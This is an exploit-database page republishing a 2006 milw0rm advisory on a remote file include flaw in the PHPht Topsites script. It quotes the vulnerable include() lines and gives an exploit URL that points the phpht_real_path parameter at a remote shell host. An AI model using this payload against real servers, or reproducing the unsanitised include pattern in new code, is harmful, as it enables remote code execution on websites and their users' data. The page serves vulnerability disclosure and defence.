header-logo
Suggest Exploit
vendor:
PHPht Topsites
by:
xoron
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: PHPht Topsites
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpht Topsites (phpht_real_path) Remote File Include Vulnerability

A remote file include vulnerability exists in PHPht Topsites, due to insufficient sanitization of user-supplied input to the 'phpht_real_path' parameter of the 'common.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary PHP code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

phpht Topsites (phpht_real_path) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Author: xoron

www.xoron.biz - www.xoron.info

Ne mutlu Türküm Diyene..!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL:
http://www.linkini.net/phpscripts/descargas/Top%20Sites%20(8%20Archivos)/PHPht%20Topsites.zip

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:


include($phpht_real_path . 'config.'.$phpEx);
include($phpht_real_path . 'includes/db.'.$phpEx);
include($phpht_real_path . 'includes/Template.'.$phpEx);
include($phpht_real_path . 'language/lang_english/lang_main.'.$phpEx);


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[script_path]/common.php?phpht_real_path=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: chaos, nukedx, OG, Preddy, Ironfist, SHiKaA, ERNE :)
Special: Str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-12]

Navigation

Suggest Exploit

Services By CQR